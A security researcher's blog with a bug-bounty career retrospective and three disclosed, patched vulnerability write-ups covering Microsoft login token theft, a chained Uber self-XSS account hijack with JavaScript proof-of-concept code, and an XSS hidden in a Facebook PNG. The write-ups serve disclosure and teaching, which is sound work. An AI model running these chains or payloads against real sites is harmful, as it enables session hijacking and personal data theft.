LATEST POSTS
April 19, 2020
Jack
Reading time ~13 minutes

FROM BUG BOUNTY HUNTER, TO ENGINEER, AND BEYOND

A couple weeks ago I had my last day on Facebook’s Product Security team. A bittersweet moment, but one which marks a “new chapter” in my life…
I’ve spent just over 4 years working on “the other side” of bug bounties, but it’s also been 4 years since I last blogged, so I wanted to share some of what I learned in going from hacking on programs to being a security engineer.
I also wanted to share a bit about the journey I took. This is one of the first times I’ve been able to fully reflect (in a kinda long, rambly way), so writing this down was always going to be fun.

-------------------------

“OLD-SCHOOL” BUG BOUNTY

Without sounding like an old-school, grey-beard hacker (I’m not _that_ old), the landscape _really_ has changed over the ~8 years I’ve been following, and been a part of, the bug bounty community. “Back in the day” you mainly had a choice of Google, Mozilla, Facebook and PayPal to hack on. I have fond memories of having a Google alert set up for the words “bug bounty” and “vulnerability disclosure program”, just so that I could find any new program to hack on. There was also Bugcrowd’s infamous “The List”, which I’d consult. Aside from the limited number of programs, the tools and techniques used to find bugs on these various sites were wildly different than they are now.
Believe it or not, even the generic “paste an XSS payload into a search box” bug taught in various old tutorials was a valid finding on large programs.
Now, it seems like a lot of the effort put into finding bugs is in the context of recon - finding assets and end-points which could be pretty green and untouched, increasing the likelihood of finding a high-paying bug. This is not necessarily a bad thing, it just means that it’s more important than ever for new-comers to understand WebAppSec techniques _and_ the various recon tooling. (As a side note, the one program I know of which _doesn’t_ require heavy recon is Facebook, given that it’s a single, huge domain, but I may be biased promoting that particular program…)

FIRST REWARD
Anyway, digging through my bug bounty folder, I managed to find the first valid bug I found, which was a CSRF issue within PayPal. This was nearly 8 years ago, but it’s what got me hooked on something (relatively) new at the time - getting paid to find bugs. I’d sent in a few bugs prior to this, both to PayPal and Facebook, but receiving a “you’ve found an eligible issue” email felt great, despite the finding being pretty low-risk.

RAMPING UP
From this point, I knew I needed to do two things:

* Learn as much as I could from other, more established researchers to understand their techniques for finding bugs (and the common patterns seen across a program)
* Find as many bugs as possible - in hindsight, this is not the best idea (as most programs value quality over quantity), but while I was starting out, it helped me get an idea of validity, and the non-technical aspects of writing reports etc

I also started blogging about my findings. The reason behind this was that I wanted to share some info back to the community that I’d learnt so much from. The other reason (which, IMO, is also a common reason) was that I could leverage these public blog posts into a job offer within the security industry. My background at the time was as a web developer, with no university degree or qualifications.

So from here, I hunted and hunted and hunted. The Yahoo program launched at some point in 2013 and it was _so_ fun. Got some great findings and responses, including the following email I recently found buried in a screenshot folder somewhere. Once they started paying their findings out via HackerOne, I had the (brief) enjoyment of being “The Top Hacker™”. That too was buried in a screenshot folder.

Around the same time, I started spending more and more time exclusively on the Facebook program. This is a trend I still see today - as you hack more and more on the same program, you start to get a sense for how the code is written (despite black-boxing it), for when new code is deployed (despite not having access to the CI infra), and for when a mistake may have been made (which is when you turn that “spidey sense” into a valid submission).
FACEBOOK BUG BOUNTY
The Facebook Bug Bounty program is where I spent the majority of my free time. I never made #1 on their leaderboard (always #2…), but I found some fun bugs and wrote up some interesting posts. Over time I got to _really_ understand the code behind www, despite never having seen it. The majority of findings are what would be called IDORs, although “bypassing read/write privacy” is a nicer term IMO.

One of many fun screenshots from the Whitehat program

My biggest finding came when I found a way of accessing anyone’s account. This bug was one of the most simple, generic IDORs you could think of (change “profile_id” to someone else’s user ID…), but as with most programs, Facebook pays based on impact, not on complexity.
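The “change profile_id” bug above is the canonical IDOR shape: the server trusts a client-supplied object ID without checking ownership. A minimal sketch of both the flaw and the fix - all names (getProfileVulnerable, session, the data itself) are hypothetical illustrations, not Facebook’s code:

```javascript
// Hypothetical data store for illustration only.
const profiles = {
  1001: { owner: 1001, email: "alice@example.com" },
  1002: { owner: 1002, email: "bob@example.com" },
};

// Vulnerable: trusts the client-supplied profile_id outright,
// so any authenticated user can read any profile.
function getProfileVulnerable(session, profileId) {
  return profiles[profileId]; // no ownership check
}

// Fixed: verify the requested object actually belongs to the
// authenticated user before returning it.
function getProfileFixed(session, profileId) {
  const profile = profiles[profileId];
  if (!profile || profile.owner !== session.userId) {
    throw new Error("forbidden");
  }
  return profile;
}
```

The impact-over-complexity point holds here: the missing check is a one-line fix, but the bug it leaves behind exposes every account.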
For this bug, and others, they issued me one of the coveted Whitehat Debit Cards. It was fun (read: _slightly_ annoying) having credit card receipts issued to Mr. Bounty. Understandably, these aren’t used anymore as loading up and sending out thousands of cards per year would be too much, but back then the card itself was worth (to me, in terms of sentimental value) almost as much as the dollar reward.

After a few years of hacking, Facebook spun up a ProdSec team in London, which was perfect as I’m based in the UK and didn’t want to leave to go to America. I got the opportunity to interview for the role of Product Security Engineer, went to the office, did the interview…

-------------------------

JOINING FACEBOOK
…and failed. It sucked - joining Facebook was one of the end-goals of me spending so much time hacking on their program. But the reason I’m mentioning this (likely for the first time) is that in terms of a career, going back and having to re-learn some areas that you’re not 100% at isn’t a huge deal. I re-interviewed a while later and then joined in April 2016. My first day was such a surreal experience. For years I knew the website inside and out, but finally I got a laptop with a check-out of the codebase.
_Spoiler: this post doesn’t contain any NDA-breaching info that will help you find bugs in Facebook. If you really want access to the secret codebase, CLICK HERE_

I went through the usual bootcamp process that Facebook has, and finally joined the team to start looking for bugs and suggesting improvements to various product teams. This was when I made the (virtual) switch from being a “hunter” to an “engineer”.

“EVERYTHING IS A P0”

A mindset that I _needed_ to shift out of when joining Facebook was a common one that a lot of researchers have, and that’s that “every finding is a P0, you MUST fix this now, if you don’t the world will end and society will collapse”. Now, there _could_ be the odd bug where this is the case, but most of the time when working with a product team you need to understand trade-offs, and come up with solutions that are fair to areas other than security. You could be the most l33t researcher, dropping 0-days and absolutely crushing it, but if you can’t articulate risk to a _non_-security engineer, then it’s not going to work out.

RUNNING A PROGRAM
Given that my background is in bug bounties, it made sense for me to start working on Facebook’s own program. This too needed a bit of a mindset switch - I’d never triaged a report before, never looked for a root cause (other than in client-side JS), nor sat in on a payout meeting to discuss reward amounts. But one thing that I could bring to the program was the empathy aspect, given that I’d been on the _receiving_ end of messages and updates from a bug bounty program many times (one thing to note here is that this wasn’t a unique skill - at the time, and even more so now, some of the engineers working on Whitehat had bug bounty experience).
RESEARCHER ENGAGEMENT

One part of my role at Facebook that I kinda “accidentally” fell into was giving presentations to researchers about our team, and the Whitehat program. It started off as something that I wasn’t sure I wanted to do - public speaking was a pretty big fear of mine, but I had an awesome manager who helped me overcome this fear. But after giving my first external presentation at Nullcon in 2017, I realised this was something I actually _really_ enjoyed. Being able to share some “inside tips” on how people could succeed in the world of bug bounties was rewarding. These presentations, and focus groups run with researchers, allowed me to understand the pain points and help ensure that researchers were enjoying their experience with the program. In fact, this is probably the biggest thing I’ll miss from Whitehat.
-------------------------

FINDING BUGS AS AN ENGINEER

Whilst I was at Facebook, I did have the chance to find bugs in other programs, but my throughput went down massively. Prior to my start date, I was hunting most days and finding valid bugs in most of those sessions. However, after joining, these were the only months I hacked during (and some of these only ended up with one or two valids):

Given that my day was full up with engineering work, investigating security bugs, etc, I took the decision to ensure that my _free time_ was full of non-work related things (for more info, you should really read NathOnSecurity’s post regarding Bug Bounties and Mental Health).
But for the few times I was hunting, the technical and non-technical skills I was learning and using from helping run the Whitehat program, and from security reviews for teams, helped greatly:

VISUALISING CODE
After reviewing enough code (which believe me, I did…), you start to be able to visualise how a request is being handled. This is usually regardless of the application, or the language it’s written in, given that in most cases it’ll be roughly similar. In terms of bug bounty, this helped a lot. I could look at an end-point and guesstimate what could be happening to the parameters I’d passed in before the HTTP response is sent. Given that I’d seen some of the common mistakes software engineers had made over the years with handling user-provided data, you can then assume that other engineering teams at other companies could be making similar mistakes, and therefore find bugs that way. The great thing about this is that you _don’t_ need to join a tech company to learn this skill. Choose a random web app open source project on GitHub and take a look through some of the previous security issues they’ve had. You’ll see real world mistakes, from real world engineers, and can then start to visualise these mistakes when black-box testing a bug bounty property.

EMPATHY
As I mentioned above, empathy was a key aspect to the 4 years at Facebook, both inside and outside of work. As a researcher, sending in a submission, you want to have a reply within minutes, a fix within hours, and a $$$$ payout within a day. In an ideal world, that’d be the case, but it doesn’t work like that. When sending in bugs, you have to understand the _huge_ amount of work that could be going on behind the scenes. For example, a bug may look like a simple reflected XSS which just needs a variable wrapped in htmlspecialchars for the submission to be resolved (pro-tip: please don’t _actually_ fix XSS this way…), but in fact it’s a systemic issue in a core library used by a ton of random properties.
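For illustration, here is a JS equivalent of the htmlspecialchars band-aid mentioned above - escaping a single value at output time. The paragraph’s point stands: when the root cause is a core library, patching one call site like this treats the symptom, and the systemic fix is output encoding applied by default in the templating layer. (Sketch only; escapeHtml is not any particular framework’s API.)

```javascript
// Roughly what PHP's htmlspecialchars(ENT_QUOTES) does, for one value.
// Ampersand must be replaced first, or the later entities get double-escaped.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}
```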
In addition, consider the fact that it may have been exploited, so now various other teams have to do IR, or legal teams need to be involved before any replies can be sent to a researcher. Now, that’s _not_ to excuse the cases where a submission gets lost in the ether, or where the program simply doesn’t care about security issues (I’m purposely leaving 30/90/120 day disclosure deadlines etc out of this post so that I don’t start a Twitter storm…), but more often than not, for a reputable program, bugs _are_ being fixed but can take a lot longer than it seems.

REWARD AMOUNTS
Similar to the empathy aspect of the (potential) long waits for bugs to be fixed, one other area that I got to learn a lot about was reward amounts. The main thing to mention here (and of course there are caveats, but this should be the same for any reputable program) is that programs aren’t trying to cheat you out of a reward. No (again, reputable) program is trying to shave $500 off of your reward just to “save money”. One of the ways that can help alleviate these concerns is by publishing reward amounts of various bug types (or even examples of amounts for previous specific findings), but even this can cause drama - if the bounty table says “SSRF - $10,000”, but you only get paid $5,000, then you’ve been cheated, right? Well, not exactly, since more often than not you need to consider the following:
* Do you need to be authenticated to perform the SSRF, and if so, what type of account do you need (one requiring high privs is going to be harder to exploit)?
* Is the host which is vulnerable to SSRF firewalled/in a DMZ?
* Can you extract data, or only blindly hit end-points with a GET?

And so on….
Programs can help you in these cases where you feel there is a discrepancy by explaining the mitigating factors (or in the case you got _more_ than $10,000, by explaining the compounding factors), but again, (most) programs aren’t lowering the amounts just to “save money”.
-------------------------

THE FUTURE
Soon I’ll be starting a new role, one which will likely see me slightly more removed from the bug bounty world, but I’ll be keeping a close eye on the ever changing techniques and novel findings 👀. In terms of the future of bug bounties, who knows what will be the new norm over the next 4 years, but regardless I’m sure it will benefit both sides of the community. I may also dump a few of my older findings from over the past few years on this blog…

THANK YOU
Finally, one thing I neglected over the years was to give a specific “thank you” to all of the various researchers who helped me be who I am today, either directly or indirectly. The OG 2012/2013 Facebook hunters (Egor, Nir, Neal, Charlie B) who blogged are a main reason I am where I am today. Then the researchers who were hacking (and still are) at the same time as me: Josip & phwd (too many fun times at DEFCON together…), Anand, Pranav, Dmitry, Youssef, and many others. There’s also the hunters who made me feel welcome at my first, and all the future, DEFCONs - Bitquark, Jhaddix, Nahamsec, and plenty more. And then finally, the people who still blow my mind when I read their posts - Ngalog for taking over the #1 spot on Uber from me, Shubs for his crazy recon skills, Frans for the sick presentations I’ve seen at our events, and so on…

April 03, 2016
Jack
Reading time ~3 minutes

OBTAINING LOGIN TOKENS FOR AN OUTLOOK, OFFICE OR AZURE ACCOUNT

_This is pretty similar to Wes’s awesome OAuth CSRF in Live, except it’s in the main Microsoft authentication system rather than the OAuth approval prompt._

Microsoft, being a huge company, have various services spread across multiple domains (*.outlook.com, *.live.com, and so on). To handle authentication across these services, requests are made to login.live.com, login.microsoftonline.com, and login.windows.net to get a session for the user. The flow for outlook.office.com is as follows:
* User browses to https://outlook.office.com
* User is redirected to https://login.microsoftonline.com/login.srf?wa=wsignin1.0&rpsnv=4&wreply=https%3a%2f%2foutlook.office.com%2fowa%2f&id=260563
* Provided that the user is logged in, a POST request is made back to the value of wreply, with the form field t containing a login token for the user:
The login endpoint URL-decodes parameters multiple times. Occasionally this can be used to bypass different filters, which is the root cause of the bug. In this case, wreply is URL-decoded before the domain is checked. Therefore https%3a%2f%2foutlook.office.com%2f becomes https://outlook.office.com/, which is valid, and the request goes through.
Which then gives us complete access to the user’s account:

Note: The token is only valid for the service which issued it - an Outlook token can’t be used for Azure, for example. But it’d be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way. This was quite a fun CSRF to find and exploit. Despite CSRF bugs not having the same credibility as other bugs, when discovered in authentication systems their impact can be pretty large.

FIX
The hostname in wreply now must end in %2f, which gets URL-decoded to /. This ensures that the browser only sends the request to the intended host.
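The surviving text elides some of the exploit detail, but the fix (forcing the hostname to end in %2f) points at a decode-before-check mismatch: the server URL-decodes wreply before validating the domain, while the browser navigates to the raw value. A minimal sketch of that discrepancy, assuming an attacker-controlled host evil.example (the exact exploit URL is not preserved in the post):

```javascript
// Illustrative wreply value: "%2f" hides a "/" from the browser but not
// from the server's decode-then-check validation.
const wreply = "https://outlook.office.com%2f@evil.example/";

// Server side: decode first, *then* inspect the hostname.
// After decoding, %2f becomes "/", so the URL reads
// "https://outlook.office.com/@evil.example/" and the check passes.
const serverSees = new URL(decodeURIComponent(wreply)).hostname;

// Browser side: the raw value is parsed as-is, so
// "outlook.office.com%2f" lands in the userinfo portion (before "@")
// and the real destination host is the attacker's.
const browserSees = new URL(wreply).hostname;
```

Requiring the hostname to end in a decoded "/" closes exactly this gap: the browser then sees a path delimiter where the userinfo trick needed an "@" to follow.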
TIMELINE
* Sunday, 24th January 2016 - Issue Reported
* Sunday, 24th January 2016 - Issue Confirmed & Triaged
* Tuesday, 26th January 2016 - Issue Patched

March 22, 2016
Jack
Reading time ~6 minutes

UBER BUG BOUNTY: TURNING SELF-XSS INTO GOOD-XSS

_Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts._

On Uber’s Partners portal, where drivers can log in and update their details, I found a very simple, classic XSS: changing the value of one of the profile fields to a script payload causes the code to be executed, and an alert box popped. This took all of two minutes to find after signing up, but now comes the fun bit.
SELF-XSS
Being able to execute additional, arbitrary JavaScript under the context of another site is called Cross-Site Scripting (which I’m assuming 99% of my readers know). Normally you would want to do this against other users in order to yank session cookies, submit XHR requests, and so on. If you _can’t_ do this against another user - for example, the code only executes against your account - then this is known as a self-XSS. In this case, it would seem that’s what we’ve found. The address section of your profile is only shown to you (the exception may be if an internal Uber tool also displays the address, but that’s another matter), and we can’t update another user’s address to force it to be executed against them. I’m always hesitant to send in bugs which have potential (an XSS in this site would be cool), so let’s try and find a way of removing the “self” part from the bug.

UBER OAUTH LOGIN FLOW

The OAuth flow that Uber uses is pretty typical:

* User visits an Uber site which requires login, e.g. partners.uber.com
* User is redirected to the authorisation server, login.uber.com
* User enters their credentials
* User is redirected back to partners.uber.com with a code, which can then be exchanged for an access token

In case you haven’t spotted from the above screenshot, the OAuth callback, /oauth/callback?code=..., doesn’t use the recommended state parameter. This introduces a CSRF vulnerability in the login function, which may or may not be considered an important issue. In addition, there is a CSRF vulnerability in the logout function, which _really_ isn’t considered an issue. Browsing to /logout destroys the user’s partners.uber.com session, and performs a redirect to the same logout function on login.uber.com. Since our payload is only available inside our account, we want to log the user into our account, which in turn will execute the payload. However, logging them into our account destroys their session, which destroys a lot of the value of the bug (it’s no longer possible to perform actions on their account). So let’s chain these three minor issues (self-XSS and two CSRFs) together.

_For more info on OAuth security, check out @homakov’s awesome guide._
CHAINING MINOR BUGS
Our plan has three parts to it:

* First, log the user out of their partners.uber.com session, but _not_ their login.uber.com session. This ensures that we can log them back into their account
* Second, log the user into _our_ account, so that our payload will be executed
* Finally, log them back into _their_ account, whilst our code is still running, so that we can access their details

STEP 1. LOGGING OUT OF ONLY ONE DOMAIN

We first want to issue a request to https://partners.uber.com/logout/, so that we can then log them into our account. The problem is that issuing a request to this end-point results in a 302 redirect to https://login.uber.com/logout/, which destroys the session. We can’t intercept each redirect and drop the request, since the browser follows these implicitly. However, one trick we can do is to use Content Security Policy to define which sources are allowed to be loaded (I hope you can see the irony in using a feature designed to help mitigate XSS in this context). We’ll set our policy to only allow requests to partners.uber.com, which will block https://login.uber.com/logout/. This works, as indicated by the CSP violation error message:

STEP 2. LOGGING INTO OUR ACCOUNT

This one is relatively simple. We issue a request to https://partners.uber.com/login/ to initiate a login (this is needed else the application won’t accept the callback). Using the CSP trick we prevent the flow being completed, then we feed in our own code (which can be obtained by logging into our own account), which logs them in to our account. Since a CSP violation triggers the onerror event handler, this will be used to jump to the next step.

// Initiate login so that we can redirect them
var login = function() {
  var loginImg = document.createElement('img');
  loginImg.src = 'https://partners.uber.com/login/';
  loginImg.onerror = redir;
};

// Redirect them to login with our code
var redir = function() {
  // Get the code from the URL to make it easy for testing
  var code = window.location.hash.slice(1);
  var loginImg2 = document.createElement('img');
  loginImg2.src = 'https://partners.uber.com/oauth/callback?code=' + code;
  loginImg2.onerror = function() {
    // Redirect to the profile page with the payload
    window.location = 'https://partners.uber.com/profile/';
  };
};
STEP 3. SWITCHING BACK TO THEIR ACCOUNT

This part is the code that will be contained as the XSS payload, stored in our account. As soon as this payload is executed, we can switch back to their account. This MUST be in an iframe - we need to be able to continue running our code.

// Create the iframe to log the user out of our account and back into theirs
var loginIframe = document.createElement('iframe');
loginIframe.setAttribute('src', 'https://fin1te.net/poc/uber/login-target.html');
document.body.appendChild(loginIframe);

The contents of the iframe uses the CSP trick again:

// Log them into partners via their session on login.uber.com
var redir = function() {
  window.location = 'https://partners.uber.com/login/';
};

The final piece is to create _another_ iframe, so we can grab some of their data.

// Wait a few seconds, then load the profile page, which is now *their* profile
setTimeout(function() {
  var profileIframe = document.createElement('iframe');
  profileIframe.setAttribute('src', 'https://partners.uber.com/profile/');
  profileIframe.setAttribute('id', 'pi');
  document.body.appendChild(profileIframe);
  // Extract their email as PoC
  profileIframe.onload = function() {
    var d = document.getElementById('pi').contentWindow.document.body.innerHTML;
    var matches = /value="([^"]+)" name="email"/.exec(d);
    alert(matches);
  };
}, 9000);
Since our final iframe is loaded from the same origin as the profile page containing our JS, and X-Frame-Options is set to sameorigin, NOT deny, we can access the content inside of it (using contentWindow).
PUTTING IT ALL TOGETHER

After combining all the steps, we have the following attack flow:

* Add the payload from step 3 to our profile
* Login to our account, but cancel the callback and make note of the unused code parameter
* Get the user to visit the file we created from step 2 - this is similar to how you would execute a reflected-XSS against someone
* The user will then be logged out, and logged into our account
* The payload from step 3 will be executed
* In a hidden iframe, they’ll be logged out of _our_ account
* In another hidden iframe, they’ll be logged into _their_ account
* We now have an iframe, in the same origin, containing the user’s session
This was a fun bug, and proves that it’s worth persevering to show a bug can have a higher impact than originally thought.

January 27, 2016
Jack
Reading time ~6 minutes

AN XSS ON FACEBOOK VIA PNGS & WONKY CONTENT TYPES

Content uploaded to Facebook is stored on their CDN, which is served via various domains (most of which are sub-domains of either akamaihd.net or fbcdn.net). The captioning feature of Videos also stores the .srt files on the CDN, and I noticed that right-angle brackets were un-encoded.

https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xaf1/….srt

I was trying to think of ways to get the file interpreted as HTML. Maybe MIME sniffing (since there’s no X-Content-Type-Options header)?
It’s actually a bit easier than that. We can just change the extension to .html (which probably shouldn’t be possible…).

https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xaf1/t39.2093-6/….html

Unfortunately left angles are stripped out (which I later found out was due to @phwd’s very much related finding), so there’s not much we can do here. Instead, I looked for other files which could also be loaded as text/html. A lot of the photos/videos on Facebook now seem to contain a hash in the URL (parameters oh and __gda__), which causes an error to be thrown if we modify the file extension. Luckily, advert images don’t contain these parameters. All that we have to do now is find a way to embed some HTML into an image. The trouble is that Exif data is stripped out of JPEGs, and iTXt chunks are stripped out of PNGs. If we try to blindly insert a string into an image and upload it, we receive an error.
PNG IDAT CHUNKS
I started searching for ideas and came across this great blog post: “Encoding Web Shells in PNG IDAT chunks”. This section of this bug is made possible due to that post, so props to the author. The post describes encoding data into the IDAT chunk, which ensures it’ll stay there even after the modifications Facebook’s image uploader makes. The author kindly provides a proof-of-concept image, which worked perfectly (the PHP shell obviously won’t execute, but it demonstrates that the data survived uploading).

Now, I could have submitted the bug there and then - we’ve got proof that images can be served with a content type of text/html, and angle brackets aren’t encoded (which means we can certainly inject HTML). But that’s boring, and everyone knows an XSS isn’t an XSS without an alert box.
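Checking whether an injected payload survived re-processing amounts to walking the file’s chunk layout - the same thing the hexdump later in this post does by eye. A minimal chunk walker (my own sketch, not the referenced post’s tooling; chunk CRCs are ignored):

```javascript
// A PNG is an 8-byte signature followed by chunks of the form:
// 4-byte big-endian length, 4-byte ASCII type, data, 4-byte CRC.
function listChunks(buf) {
  const chunks = [];
  let off = 8; // skip the PNG signature
  while (off + 8 <= buf.length) {
    const len = buf.readUInt32BE(off);
    const type = buf.toString("ascii", off + 4, off + 8);
    chunks.push({ type, data: buf.subarray(off + 8, off + 8 + len) });
    off += 12 + len; // length + type + data + CRC
  }
  return chunks;
}
```

Running this over an uploaded image and grepping the IDAT data for the payload bytes confirms whether the uploader’s re-compression left them intact.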
The author also provides an XSS-ready PNG, which I could just upload and be done. But since it references a remote JS file, I wasn’t too keen on the bug showing up in a referer log. Plus I wanted to try myself to create one of these images.

As mentioned in the post, the first step is to craft a string that, when compressed using DEFLATE, produces the desired output. Which in this case is:

Combining the result with the PHP code for reversing PNG filters and generating the image gives us the following:

Which, when dumped, shows our payload:

fin1te@mbp /tmp » hexdump -C xss-fnt-pe-png.png
00000000  89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e  |.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00 00 65 49 44 41 54 48 89  |...+.....eIDATH.|
00000040  63 ac ff 3c 53 43 52 49 50 54 20 53 52 43 3d 2f  |c..<SCRIPT SRC=/|
00000070  43 2f 0f b5 ab a7 af ca 7e 7d 2d ea e2 90 22 ae  |C/......~}-...".|
00000080  73 85 45 60 7a 90 d1 8c 3f 0c a3 60 14 8c 82 51  |s.E`z...?..`...Q|
00000090  30 0a 46 c1 28 18 05 a3 60 14 8c 82 61 00 00 78  |0.F.(...`...a..x|
000000a0  32 1c 02 78 65 1f 48 00 00 00 00 49 45 4e 44 ae  |2..xe.H....IEND.|
000000b0  42 60 82                                         |B`.|

We can then upload it to our advertiser library, and browse to it (with an extension of .html).

BYPASSING LINK SHIM
What can you do with an XSS on a CDN domain? Not a lot. All I could come up with is a Link Shim bypass. Link Shim is a script/tool which all external links on Facebook are forced through. This then checks for malicious content. CDN URLs however _aren’t_ Link Shim’d, so we can use this as a bypass.
MOVING FROM THE AKAMAI CDN HOSTNAME TO *.FACEBOOK.COM

Redirects are pretty boring. So I thought I’d check to see if any *.facebook.com DNS entries were pointing to the CDN. I found photo.facebook.com (I forgot to screenshot the output of dig before the patch, so here’s an entry from Google’s cache):

Browsing to this host with our image as the path loads a JavaScript file from fnt.pe, which then displays an alert box with the hostname.
Any session cookies are marked as HTTPOnly, and we can’t make requests to www.facebook.com. What do we do other than popping an alert box?

ENTER DOCUMENT.DOMAIN

It’s possible for two pages from a different origin, but sharing the same parent domain, to interact with each other, providing they both set the document.domain property to the parent domain. We can easily do this for our page, since we can run arbitrary JavaScript. But we also need to find a page on www.facebook.com which does the same, and doesn’t have an X-Frame-Options header set to DENY or SAMEORIGIN (we’re still cross-origin at this point). This wasn’t too difficult to find - Facebook has various plugins which are meant to be placed inside an iframe…